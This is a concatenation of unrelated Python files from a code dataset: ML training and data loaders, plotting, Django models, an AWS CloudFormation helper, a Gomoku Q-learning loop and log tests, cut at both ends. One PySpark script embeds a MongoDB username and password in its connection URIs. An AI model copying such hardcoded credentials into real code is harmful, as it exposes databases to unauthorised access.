torch.Tensor(self.trainloader.dataset.triplets())[:,1] - 1\n\t\t\t\t\tassert pred_klasses.max() == 69, pred_klasses.max()\n\t\t\t\t\tassert pred_klasses.min() == 0, pred_klasses.min()\n\t\t\t\t\tweights = torch.histc(pred_klasses, bins=70, min=0, max=69)\n\t\t\t\t\ttrain_loss_fn = nn.CrossEntropyLoss(weights)\n\t\t\t\t\ttrain_loss = LossCalculator(self.model, input_key=lambda model, batch: model(batch), target_key='preds', loss_fn=train_loss_fn)\n\t\t\t\telse:\n\t\t\t\t\tprint('NOT using weighted loss...')\n\t\t\t\t\ttrain_loss = LossCalculator(self.model, input_key=lambda model, batch: model(batch), target_key='preds')\n\t\t\t\ttest_loss = LossCalculator(self.model, input_key=lambda model, batch: model(batch), target_key='preds')\n\t\t\t\tself.solver = Solver(self.model, self.optimizer, verbose=True, scheduler=self.scheduler, train_loss=train_loss, test_loss=test_loss, **self.opts.__dict__)\n\n\tdef setup_data(self):\n\t\ttransform = unrel.TRANSFORM\n\t\t# Initialize trainset\n\t\tself.trainset = data.Dataset(split='train', pairs='annotated', transform=transform)\n\t\tif self.opts.train_size:\n\t\t\tprint('Using subset of %d from train_set' % self.opts.train_size)\n\t\t\tbatch_sampler = sampler.SequentialSampler(range(self.opts.train_size))\n\t\telse:\n\t\t\tbatch_sampler = None\n\t\tself.trainloader = data.FauxDataLoader(self.trainset, sampler=batch_sampler, batch_size=self.opts.batch_size)\n\t\t# Initialize testset\n\t\tif self.opts.do_validation:\n\t\t\tself.testset = data.Dataset(split='test', pairs='annotated', transform=transform)\n\t\t\tbatch_sampler = sampler.BatchSampler(sampler.SequentialSampler(self.testset), self.opts.test_batch_size, False) # make test set load without shuffling so that we can use Tyler's RecallEvaluator\n\t\t\tself.testloaders = [data.FauxDataLoader(self.testset, sampler=batch_sampler)]\n\t\telse:\n\t\t\tprint('No testset')\n\t\t\tself.testloaders = []\n\nif __name__ == '__main__':\n\tr = Runner()\n\tr.setup()\n\tr.train()\n","sub_path":"run/e2e_runner.py","file_name":"e2e_runner.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"558423003","text":"from data_aug.gaussian_blur import GaussianBlur\n\n#####\nfrom PIL import Image, ImageOps\n\nimport os\nimport glob \nimport torch\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport torchvision.transforms as transforms \n\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torchvision import datasets\n\nnp.random.seed(987)\ntorch.manual_seed(987)\n\nimg_size=256\nimg_size=512\n\n# ich,ivh,sah,sdh,edh\n\nclass BloodDataset_Test(Dataset):\n def __init__(self, path, ch=1):\n self.path = path\n self.ch = ch \n self.trans = transforms.Compose([\n transforms.Resize(img_size),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5]*self.ch,std=[0.5]*self.ch)\n ]) \n \n self.data = []\n self.dirs = glob.glob(path+\"/*\")\n \n dirs = os.listdir(path)\n for _dir in sorted(dirs):\n files = os.listdir(os.path.join(path,_dir))\n for _fname in files:\n self.data.append((_dir, # ex: ID_3bfxedafae \n _fname, # ex: 3bfxedafae_3.jpg \n _fname[:_fname.find('_')], # ex: 3bfxedafae \n int(_fname[_fname.find('_')+1:_fname.find('.jpg')])) # ex:3\n )\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n _dir, _fname, _uid, _idx = self.data[idx]\n if self.ch==1:\n img_path = os.path.join(self.path,_dir,_fname)\n img = Image.open(img_path).resize((img_size,img_size))\n img = self.trans(img)\n return img, _dir, _fname\n else:\n stack = []\n for i in range(self.ch):\n img_path = os.path.join(self.path,_dir,f\"{_uid}_{_idx+i-self.ch//2}.jpg\")\n if not os.path.exists(img_path):\n img_path = os.path.join(self.path,_dir,_fname)\n img = Image.open(img_path).resize((img_size,img_size))\n img = np.array(img).astype(np.uint8)\n stack.append(img)\n stack = np.stack(stack, axis=-1)\n img = Image.fromarray(stack)\n img = self.trans(img)\n return img, _dir, _fname\n\nclass BloodDataset(Dataset):\n def __init__(self, path, dirs, trans, ch=1):\n assert ch%2==1\n\n df = pd.read_csv(path.rstrip('/')+\".csv\")\n #df = pd.read_csv(path.rstrip('/')+\"_clean.csv\")\n \n self.path = path\n self.dirs = dirs \n self.trans = trans \n self.ch = ch \n \n self.data = []\n self.label = []\n for _dir in dirs:\n sub_df = df.loc[df['dirname']==_dir]\n for row in sub_df.to_numpy():\n _dir, _fname = row[:2]\n self.data.append((_dir, # ex: ID_3bfxedafae\n _fname, # ex: 3bfxedafae_3.jpg\n _fname[:_fname.find('_')], # ex:3bfxedafae\n int(_fname[_fname.find('_')+1:_fname.find('.jpg')])) # ex:3\n )\n self.label.append(row[2:])\n self.label = np.stack(self.label, axis=0)\n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, idx):\n _dir, _fname, _uid, _idx = self.data[idx]\n if self.ch==1:\n img_path = os.path.join(self.path,_dir,f\"{_uid}_{_idx}.jpg\")\n img = Image.open(img_path).resize((img_size,img_size))\n img = self.trans(img)\n return img, self.label[idx].astype(np.bool)\n else:\n stack = []\n for i in range(self.ch):\n img_path = os.path.join(self.path,_dir,f\"{_uid}_{_idx+i-self.ch//2}.jpg\")\n if not os.path.exists(img_path):\n img_path = os.path.join(self.path,_dir,f\"{_uid}_{_idx}.jpg\")\n img = Image.open(img_path).resize((img_size,img_size))\n img = np.array(img).astype(np.uint8)\n stack.append(img)\n stack = np.stack(stack, axis=-1)\n img = Image.fromarray(stack)\n img = self.trans(img)\n return img, self.label[idx].astype(np.bool)\n\n def collate_fn(self, samples):\n batch_imgs, batch_lbls = [],[]\n for img, lbl in samples:\n batch_imgs.append(img.unsqueeze(0))\n batch_lbls.append(lbl)\n batch_imgs = torch.cat(batch_imgs,dim=0)\n batch_lbls = torch.tensor(batch_lbls).float()\n return batch_imgs, batch_lbls\n \n @staticmethod \n def get_transform(ch=1):\n train_trans = transforms.Compose([\n transforms.Resize(img_size),\n transforms.RandomRotation(60, fill=(0,)),\n transforms.RandomHorizontalFlip(),\n transforms.RandomApply([\n transforms.ColorJitter(0.1,0.1,0.1,0)\n ],p=0.4),\n #GaussianBlur(kernel_size=int(0.01 * img_size)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5]*ch, std=[0.5]*ch)\n ])\n test_trans = transforms.Compose([\n transforms.Resize(img_size),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5]*ch, std=[0.5]*ch)\n ])\n return train_trans, test_trans\n\nclass DatasetWrapper(object):\n\n def __init__(self, path, bsize, valid_size=0.15, ch=1):\n self.path = path \n self.bsize = bsize\n self.valid_size = valid_size\n self.ch = ch \n \n def get_dataloaders(self):\n # split train dirs\n dirs = os.listdir(self.path)\n np.random.shuffle(dirs)\n split = int(len(dirs) * (1-self.valid_size))\n train_dirs, valid_dirs = dirs[:split], dirs[split:]\n\n # dump train valid split\n os.system(\"mkdir -p ./checkpoints\")\n '''\n with open(\"./checkpoints/train_valid_split.pkl\", 'wb') as f:\n pickle.dump({'train':train_dirs, 'valid':valid_dirs},\n f, protocol=pickle.HIGHEST_PROTOCOL)\n '''\n with open(\"./checkpoints/train_set.pkl\", \"wb\") as f:\n pickle.dump(train_dirs, f, protocol=pickle.HIGHEST_PROTOCOL)\n with open(\"./checkpoints/valid_set.pkl\", \"wb\") as f:\n pickle.dump(valid_dirs, f, protocol=pickle.HIGHEST_PROTOCOL)\n print(\"\\t[Info] dump train valid set\")\n\n # data aug\n train_trans, valid_trans = BloodDataset.get_transform(self.ch)\n\n # dataset\n train_dataset = BloodDataset(self.path, train_dirs, train_trans, self.ch)\n valid_dataset = BloodDataset(self.path, valid_dirs, valid_trans, self.ch)\n\n # dataloader\n train_loader = DataLoader(train_dataset,\n batch_size=self.bsize,\n collate_fn=train_dataset.collate_fn,\n num_workers=6,\n shuffle=True)\n valid_loader = DataLoader(valid_dataset,\n batch_size=self.bsize,\n collate_fn=valid_dataset.collate_fn,\n num_workers=6)\n return train_loader, valid_loader \n\nclass SimCLRTrans(object):\n def __init__(self, trans):\n self.trans = trans\n\n def __call__(self, sample):\n xi = self.trans(sample)\n xj = self.trans(sample)\n return xi,xj\n\n","sub_path":"wubinray/base/data_aug/dataset_wrapper.py","file_name":"dataset_wrapper.py","file_ext":"py","file_size_in_byte":7547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"506021726","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n\r\ndef autolabel(rects):\r\n for rect in rects:\r\n height = rect.get_height()\r\n plt.text(rect.get_x()+rect.get_width()/2. - 0.1, 1.015*height, '%s' % int(height))\r\n\r\ndata = pd.read_csv('./data/train.csv').values[:, 1]\r\nprint(data.shape)\r\nmale, female = 0, 0\r\nfor i in range(data.shape[0]):\r\n if data[i] == 0:\r\n male += 1\r\n else:\r\n female += 1\r\nname_list = ['male', 'female']\r\nnum_list = [male, female]\r\nautolabel(plt.bar(range(len(num_list)), num_list, color='br', tick_label=name_list))\r\nplt.xlabel('label')\r\nplt.ylabel('number')\r\nplt.title('label statistics')\r\nplt.savefig('./figure/label statistics.png')\r\nplt.show()\r\n","sub_path":"draw_2.py","file_name":"draw_2.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"119962770","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 2 17:54:33 2017\n\n@author: chen\n\"\"\"\nimport scipy.io\n\ndata = scipy.io.loadmat('tuning.mat')\n\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nplt.plot(np.transpose(data['stim']), np.transpose(data['neuron1']))\n\nplt.plot(np.transpose(data['stim']), np.transpose(data['neuron2']))\n\nplt.plot(np.transpose(data['stim']), np.transpose(data['neuron3']))\n\nplt.plot(np.transpose(data['stim']), np.transpose(data['neuron4']))\n\n\n\na1 = max(np.mean(data['neuron1'], axis = 0))\n\nb1 = max(np.mean(data['neuron2'], axis = 0))\n\nz = np.degrees(np.arctan(np.mean(data1['r2'])/b1/np.mean(data1['r1'])*a1))\nplt.plot(np.mean(data['neuron1']*10, axis = 0), np.var(data['neuron1']*10,axis = 0))\nplt.plot(np.mean(data['neuron2']*10, axis = 0), np.var(data['neuron2']*10,axis = 0))\nplt.plot(np.mean(data['neuron3']*10, axis = 0), np.var(data['neuron3']*10,axis = 0))\nplt.plot(np.mean(data['neuron4']*10, axis = 0), np.var(data['neuron4']*10,axis = 0))","sub_path":"projects/Chen_Liang/decoding.py","file_name":"decoding.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"334817726","text":"from django.db import models\nfrom polymorphic import PolymorphicModel\n\nclass Course(models.Model):\n title = models.CharField(max_length=255)\n blocks = models.ManyToManyField('Block')\n\nclass Block(PolymorphicModel):\n active = models.BooleanField(default=True)\n\n def describe(self):\n \"\"\"Return a dictionary-like object with key properties.\"\"\"\n return { 'type': 'Block', 'active': self.active }\n\nclass TextBlock(Block):\n title = models.CharField(max_length=255)\n body = models.TextField()\n\n def describe(self):\n \"\"\"Return a dictionary-like object with key properties.\"\"\"\n desc = super(TextBlock, self).describe()\n desc = {} if desc is None else desc\n desc.update({\n 'type': 'text-block',\n 'title': self.title,\n 'body': self.body})\n return desc\n\nclass ImageBlock(Block):\n link = models.CharField(max_length=255)\n caption = models.CharField(max_length=255)\n\n def describe(self):\n \"\"\"Return a dictionary-like object with key properties.\"\"\"\n desc = super(ImageBlock, self).describe()\n desc = {} if desc is None else desc\n desc.update({\n 'type': 'image-block',\n 'link': self.link,\n 'caption': self.caption})\n return desc\n","sub_path":"fabled/course/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"321645810","text":"\ndata = open('day9.in').read().strip()\n\nscore, level, num_garbage, i = [0] * 4\nin_garbage = False\n\n\nwhile i < len(data):\n c = data[i]\n if in_garbage:\n if c == '!':\n i += 1\n elif c == '>':\n in_garbage = False\n else:\n num_garbage += 1\n else:\n if c == '{':\n level += 1\n elif c == '}':\n score += level\n level -= 1\n elif c == '<':\n in_garbage = True\n i += 1\n\nprint('Part 1: {}\\nPart 2: {}'.format(score, num_garbage))\n\n","sub_path":"python/Day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"420127786","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import date_trunc\n\nspark = SparkSession \\\n .builder \\\n .appName(\"df1\") \\\n .config(\"spark.mongodb.input.uri\", \"mongodb://edgedbuser:edgedb@10.0.0.25:27017/edgedb.tspump\") \\\n .config(\"spark.mongodb.output.uri\", \"mongodb://edgedbuser:edgedb@10.0.0.25:27017/edgedb.tspumpO\") \\\n .config(\"spark.jars.packages\", \"org.mongodb.spark:mongo-spark-connector_2.12:3.0.1\") \\\n .getOrCreate()\n\ndf = spark.read.format(\"com.mongodb.spark.sql.DefaultSource\").load()\n\ndf.printSchema() \ndf.show(10) \n\n#To remove the seconds data from the frame\ndf1=df.withColumn('hour', date_trunc(\"minute\",\"ts\"))\n\n#To show the aggregation done on the grouped data \ndf1.groupby('hour').mean().show()\n\n#To select the avg values \ndf2=df1.groupby('hour').mean()\ndf2.select('hour','avg(current)').show()\n","sub_path":"spark/analysis/df1.py","file_name":"df1.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"357991703","text":"\nfrom django.forms import ModelForm\nfrom .models import (Documents, \n Student,\n ParentDetails,\n ContactDetails,\n AdditionalDetails)\nfrom django.forms.widgets import DateInput, Select\n\n\n\nclass StudentFrom(ModelForm):\n class Meta:\n model = Student\n exclude = ['user', 'create_at', 'student_id']\n widgets = {\n 'DOB': DateInput(attrs={'type': 'date'})\n }\n\n def __init__(self, *args, **kwargs):\n super(StudentFrom, self).__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n\n\nclass DocumentsFrom(ModelForm):\n class Meta:\n model = Documents\n exclude = ['user', 'create_at', 'student_id']\n\n def __init__(self, *args, **kwargs):\n super(DocumentsFrom, self).__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control pb-4'\n\n\nclass ParentDetailsFrom(ModelForm):\n class Meta:\n model = ParentDetails\n exclude = ['user', 'create_at', 'student_id']\n widgets = {\n 'father_dob': DateInput(attrs={'type': 'date'}),\n 'mother_dob': DateInput(attrs={'type': 'date'})\n }\n\n def __init__(self, *args, **kwargs):\n super(ParentDetailsFrom, self).__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n\n\nclass ContactDetailsFrom(ModelForm):\n class Meta:\n model = ContactDetails\n exclude = ['user', 'create_at', 'student_id']\n CHOICES = [('1', 'First'), ('2', 'Second')]\n widgets = {\n 'state': Select(attrs={'class':'form-control'}, choices=CHOICES),\n 'city': Select(attrs={'class':'form-control'}, choices=CHOICES),\n 'permanent_state':Select(attrs={'class':'form-control'}),\n 'permanent_city':Select(attrs={'class':'form-control'}),\n }\n\n\n def __init__(self, *args, **kwargs):\n super(ContactDetailsFrom, self).__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n\n\nclass AdditionalDetailsFrom(ModelForm):\n class Meta:\n model = AdditionalDetails\n exclude = ['user', 'create_at', 'student_id']\n\n def __init__(self, *args, **kwargs):\n super(AdditionalDetailsFrom, self).__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n","sub_path":"student/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"25024053","text":"import boto3\nfrom cfn_flip import flip, to_yaml, to_json\nimport json\nfrom deepmerge import Merger, always_merger\nfrom dictdiffer import diff, patch\nimport re\nimport yaml\n\ncfn = boto3.client('cloudformation')\n\ndiff_merger = Merger(\n [\n (list, [\"append\"]),\n (dict, [\"merge\"])\n ],\n [\"override\"],\n [\"override\"]\n)\n\n## Data Manipulation Functions\ndef compose_reason(detail, parameters):\n if detail['ChangeSource'] == 'DirectModification':\n return \"Resource {1} {0} changed through Direct Modification\".format(detail['Target']['Name'], detail['Target']['Attribute'])\n elif detail['ChangeSource'] == 'ResourceAttribute':\n return \"Resource {1} {0} changed by Resource attribute {2}\".format(detail['Target']['Name'], re.sub(\"(ies)$\", \"y\", detail['Target']['Attribute']), detail['CausingEntity'])\n elif detail['ChangeSource'] == 'ResourceReference':\n return \"Resource {1} {0} changed by Resource {2}\".format(detail['Target']['Name'], re.sub(\"(ies)$\", \"y\", detail['Target']['Attribute']), detail['CausingEntity'])\n elif detail['ChangeSource'] == 'ParameterReference':\n return \"Resource {1} {0} changed by Parameter {2}: {03}\".format(detail['Target']['Name'], re.sub(\"(ies)$\", \"y\", detail['Target']['Attribute']), detail['CausingEntity'], parameters[detail['CausingEntity']])\n else:\n return 'unknown'\n\ndef parse_reasons(change, parameters):\n reasons = list(map(lambda x: compose_reason(x, parameters), change))\n return reasons\n\ndef parse_event(event):\n status_length = len(event['ResourceStatus'])\n tabs = \"\\t\\t\\t\\t\\t\"\n\n if status_length > 13:\n tabs = \"\\t\\t\\t\\t\"\n\n if status_length > 23:\n tabs = \"\\t\\t\\t\"\n\n if status_length > 27:\n tabs = \"\\t\\t\"\n\n if len(event['ResourceStatus']) == 44:\n tabs = \"\\t\"\n\n event_string = \"[{0}] {1} {2} \\t\\\"{3}\\\"\".format(\n event['Timestamp'].strftime(\"%Y-%M-%d %H:%M:%S UTC\"),\n \"{0}{1}\".format(event['ResourceStatus'], tabs),\n event['ResourceType'],\n event['LogicalResourceId']\n )\n return event_string\n\ndef construct_diff(args):\n print(args)\n if isinstance(args[1], str):\n node_keys = args[1].split(\".\")\n else:\n node_keys = args[1]\n leaf_index = len(node_keys) - 1\n\n obj = current = {}\n for index, key in enumerate(node_keys):\n if index == leaf_index:\n if args[0] == \"change\":\n #current[key] = \"{0} -> {1}\".format(args[2][0], args[2][1])\n current[\"- {0}\".format(key)] = args[2][0]\n current[\"+ {0}\".format(key)] = args[2][1]\n else:\n if args[0] == \"add\":\n operator = \"+\"\n elif args[0] == \"remove\":\n operator = \"-\"\n if isinstance(args[2], str):\n current[\"{0} {1}\".format(operator, key)] = args[2]\n elif isinstance(args[2], list):\n if isinstance(args[2][0], tuple):\n if isinstance(args[2][0][0], int):\n current[\"{0} {1}\".format(operator,key)] = [ args[2][0][1] ]\n else:\n current[key] = { \"{0} {1}\".format(operator,args[2][0][0]): args[2][0][1]}\n else:\n current[key] = list(map(lambda x: \"{0} {1}\".format(operator, x), args[2][0]))\n else:\n current[key] = {}\n current = current[key]\n return obj\n\ndef resource_diffs(orig, new):\n diffs = {}\n for resource in orig:\n if resource in list(new.keys()):\n resource_diff = diff(orig[resource], new[resource])\n if resource_diff:\n diffs[resource] = {}\n for index,dff in enumerate(list(resource_diff)):\n diffs[resource] = diff_merger.merge(diffs[resource], construct_diff(dff))\n return diffs\n\n## AWS API Function\ndef stack_list():\n stacks = cfn.list_stacks()\n names = list(map(lambda x: x['StackName'], stacks['StackSummaries']))\n return names\n\ndef stack_info(stack):\n stack_details = cfn.describe_stacks(StackName=stack)\n changesets = cfn.list_change_sets(StackName=stack)\n if len(changesets['Summaries']) > 0:\n stack_change_sets = list(map(lambda x: {\n 'name': x['ChangeSetName'],\n 'id': x['ChangeSetId'],\n 'status': x['Status'],\n 'exec_status': x['ExecutionStatus'],\n 'created': x['CreationTime']\n }, changesets['Summaries']))\n else:\n stack_change_sets = []\n details = list(map(lambda x: {\n 'name': stack,\n 'change_sets': stack_change_sets,\n #'current_change_set': x['ChangeSetId'],\n #'description': x['Description'],\n 'created': x['CreationTime'],\n #'last_updated': x['LastUpdatedTime'],\n 'status': x['StackStatus']\n }, stack_details['Stacks']))\n return details[0]\n\ndef change_set_info(stack, changeset):\n change_set = cfn.describe_change_set(StackName=stack, ChangeSetName=changeset)\n original_template_body = cfn.get_template(StackName=stack)['TemplateBody']\n change_set_template_body = cfn.get_template(StackName=stack, ChangeSetName=changeset)['TemplateBody']\n if isinstance(original_template_body, str):\n original_template = json.loads(to_json(original_template_body))\n print(\"Original Template is YAML\")\n else:\n original_template = dict(original_template_body)\n if isinstance(change_set_template_body, str):\n change_set_template = json.loads(to_json(change_set_template_body))\n print(\"New Template is YAML\")\n else:\n change_set_template = dict(change_set_template_body)\n\n orig_resources = original_template['Resources']\n new_resources = change_set_template['Resources']\n\n diffs = resource_diffs(orig_resources, new_resources)\n\n parameters = {item['ParameterKey']:item['ParameterValue'] for item in change_set['Parameters']}\n set_details = {\n 'parameters': parameters,\n 'changes': list(map(lambda x: {\n 'Action': x['ResourceChange']['Action'],\n 'LogicalResourceId': x['ResourceChange'].get('LogicalResourceId', None),\n 'PhysicalResourceId': x['ResourceChange'].get('PhysicalResourceId', None),\n 'Replacement': x['ResourceChange'].get('Replacement', None),\n 'ResourceType': x['ResourceChange']['ResourceType'],\n 'Scope': x['ResourceChange']['Scope'],\n 'Details': parse_reasons(x['ResourceChange']['Details'], parameters)\n }, change_set['Changes']))\n }\n\n set_info = { 'raw': change_set, 'processed': set_details, 'orig': orig_resources, 'new': new_resources, 'diffs': diffs }\n return set_info\n\ndef stack_events(stack, scope):\n raw_events = cfn.describe_stack_events(StackName=stack)['StackEvents']\n if scope:\n events = list(map(lambda x: parse_event(x), raw_events))\n print(\"Filtering events\")\n else:\n events = list(map(lambda x: parse_event(x), raw_events))\n return events\n\ndef apply_change_set(stack, changeset):\n cfn.execute_change_set(StackName=stack, ChangeSetName=changeset)\n return True\n\ndef delete_change_set(stack, changeset):\n cfn.delete_change_set(StackName=stack, ChangeSetName=changeset)\n return True\n","sub_path":"grayws/aws.py","file_name":"aws.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"463792646","text":"import unittest\n\nfrom tests.factories import UserFactory, RoomLogEntryFactory, UserLogEntryFactory, \\\n UserWithHostFactory\n\nfrom hades_logs import HadesLogs\nfrom tests import InvalidateHadesLogsMixin\n\nfrom . import UserLogTestBase\nfrom ...hades_logs import DummyHadesWorkerBase\n\n\nclass AppWithoutHadesLogsTestCase(InvalidateHadesLogsMixin, UserLogTestBase):\n def test_only_warning_log_returned(self):\n # Multiple assertions in one method to avoid useless\n # setup/teardown which leads to 5s for this class\n hades_items = self.get_logs(logtype='hades')\n self.assertEqual(len(hades_items), 1)\n self.assertIn(\"logs cannot be displayed\", hades_items[0]['message'].lower())\n\n self.assertFalse(self.get_logs(logtype='user'))\n self.assertFalse(self.get_logs(logtype='room'))\n self.assertEqual(len(self.get_logs()), 1)\n\n\nclass RoomAndUserLogTestCase(UserLogTestBase):\n def create_factories(self):\n super().create_factories()\n self.relevant_user = UserFactory.create()\n self.room_log_entry = RoomLogEntryFactory(author=self.admin, room=self.relevant_user.room)\n self.user_log_entry = UserLogEntryFactory(author=self.admin, user=self.relevant_user)\n\n def assert_one_log(self, got_logs, expected_entry):\n self.assertEqual(len(got_logs), 1)\n item = got_logs[0]\n self.assertEqual(item['message'], expected_entry.message)\n self.assertEqual(item['user']['title'], expected_entry.author.name)\n\n def test_room_log_exists(self):\n items = self.get_logs(user_id=self.relevant_user.id, logtype='room')\n self.assert_one_log(items, self.room_log_entry)\n\n def test_user_log_exists(self):\n items = self.get_logs(user_id=self.relevant_user.id, logtype='user')\n self.assert_one_log(items, self.user_log_entry)\n\n def test_no_hades_log_exists(self):\n items = self.get_logs(user_id=self.relevant_user.id, logtype='hades')\n self.assertEqual(len(items), 1)\n item = items[0]\n self.assertIn(\" cannot be displayed\", item['message'].lower())\n self.assertIn(\" connected room\", item['message'].lower())\n\n\nclass IntegrationTestCase(InvalidateHadesLogsMixin, DummyHadesWorkerBase, UserLogTestBase):\n \"\"\"Frontend Tests for the endpoints utilizing live Hades Logs\n \"\"\"\n def create_factories(self):\n super().create_factories()\n self.relevant_user = UserWithHostFactory(patched=True)\n self.other_user = UserFactory.create()\n self.room_log_entry = RoomLogEntryFactory(author=self.admin, room=self.relevant_user.room)\n self.user_log_entry = UserLogEntryFactory(author=self.admin, user=self.relevant_user)\n\n def create_app(self):\n app = super().create_app()\n\n # Setup dummy_tasks hades logs\n app.config.update(self.hades_logs_config)\n HadesLogs(app)\n\n return app\n\n def test_hades_logs_are_returned(self):\n logs = self.get_logs(user_id=self.relevant_user.id, logtype='hades')\n self.assertEqual(len(logs), 4)\n for log in logs:\n if \"rejected\" in log['message'].lower():\n continue\n self.assertIn(\"– groups: \", log['message'].lower())\n self.assertIn(\"tagged)\", log['message'].lower())\n\n def test_disconnected_user_emits_warning(self):\n logs = self.get_logs(self.other_user.id, logtype='hades')\n self.assertEqual(len(logs), 1)\n self.assertIn(\"are in a connected room\", logs[0]['message'].lower())\n self.assertIn(\"logs cannot be displayed\", logs[0]['message'].lower())\n","sub_path":"tests/frontend/user/test_logs.py","file_name":"test_logs.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"466218157","text":"import gomoku_env\nfrom gomoku_env import GomokuEnv, board_domination_heuristic\nimport numpy as np\nimport random\nfrom IPython.display import clear_output\nimport gym\ngym.register('Gomoku-v0', entry_point=GomokuEnv)\nenv = gym.make('Gomoku-v0')\n\n# for i_episode in range(1000):\n# observation = env_a.reset()\n# for t in range(100):\n# env_a.render()\n# action = env_a.action_space.sample()\n# observation, reward, done, info = env_a.step(action)\n# if done:\n# print(reward)\n# # print(\"Episode finished after {} timesteps\".format(t+1))\n# break\n# env_a.close()\n\nalpha = 0.1\ngamma = 0.6\nepsilon = 0.1\n\nverbose = False\n\na_q_table = dict()\nb_q_table = dict()\nwins, losses = 0, 0\n\nnum_of_episodes = 100000\nfor episode in range(0, num_of_episodes):\n\n # Reset the env_a\n a_state = env.reset()\n b_state = None\n # Initialize variables\n a_reward = 0\n b_reward = 0\n terminated = False\n while not terminated:\n if a_state not in a_q_table:\n a_q_table[a_state] = [0 if env.action_space.contains(i) else -np.inf for i in range(225)]\n # Take learned path or explore new actions based on the epsilon\n if random.uniform(0, 1) < epsilon:\n a_action = env.action_space.sample()\n else:\n a_action = np.argmax(a_q_table[a_state])\n\n # Take action\n next_b_state, b_reward, terminated, info = env.step(a_action, gomoku_env.PLAYER1)\n if verbose:\n print(env.observation_space)\n if terminated:\n if b_reward == -100:\n wins += 1\n if next_b_state not in b_q_table:\n b_q_table[next_b_state] = [0 if env.action_space.contains(i) else -np.inf for i in range(225)]\n # Recalculate\n if b_state is not None:\n b_q_value = b_q_table[b_state][b_action]\n max_b_value = np.max(b_q_table[next_b_state])\n new_b_q_value = (1 - alpha) * b_q_value + alpha * (b_reward + gamma * max_b_value)\n\n # Update Q-table\n b_q_table[b_state][b_action] = new_b_q_value\n b_state = next_b_state\n if terminated:\n break\n\n if b_state not in b_q_table:\n b_q_table[b_state] = [0 if env.action_space.contains(i) else -np.inf for i in range(225)]\n # Take learned path or explore new actions based on the epsilon\n if random.uniform(0, 1) < epsilon:\n b_action = env.action_space.sample()\n else:\n b_action = np.argmax(b_q_table[b_state])\n\n # Take action\n next_a_state, a_reward, terminated, info = env.step(b_action, gomoku_env.PLAYER2)\n if verbose:\n print(env.observation_space)\n if terminated:\n if a_reward == -100:\n losses += 1\n if next_a_state not in a_q_table:\n a_q_table[next_a_state] = [0 if env.action_space.contains(i) else -np.inf for i in range(225)]\n # Recalculate\n a_q_value = a_q_table[a_state][a_action]\n max_a_value = np.max(a_q_table[next_a_state])\n new_q_value = (1 - alpha) * a_q_value + alpha * (b_reward + gamma * max_a_value)\n\n # Update Q-table\n a_q_table[a_state][a_action] = new_q_value\n a_state = next_a_state\n\n\n\n\n\n\n\n\n\n\n if (episode + 1) % 100 == 0:\n print(wins,losses)\n clear_output(wait=True)\n print(\"Episode: {}\".format(episode + 1))\n env.render()\n\n if (episode + 1) % 1500 == 0:\n verbose = True\n if (episode + 1) % 101 == 0:\n verbose = False\n\n\nprint(\"**********************************\")\nprint(\"Training is done!\\n\")\nprint(\"**********************************\")","sub_path":"gym_test.py","file_name":"gym_test.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"51305490","text":"#!/usr/bin/env python\n\n\"\"\"\nPlots the responce times for Publisher-Subscriber\n\"\"\"\n\nimport matplotlib.pyplot as plot\n\n# File Names where time is stored\npsFile = \"../time_records/ps_times.txt\"\nscFile = \"../time_records/sc_times.txt\"\n\n# Convert text file into a List\npsList = [line.rstrip('\\n') for line in open(psFile)]\nscList = [line.rstrip('\\n') for line in open(scFile)]\n\n# Print the list\nprint(psList)\nprint(scList)\n\n# Convert the numbers in the list to be within 0.01 seconds\ni = 0\nwhile i < len(psList) : \n psList[i] = round(float(psList[i]), 1) \n i += 1\ni = 0\nwhile i < len(scList) : \n scList[i] = round(float(scList[i]), 1) \n i += 1\n\n# Print the modified list\nprint(\"After 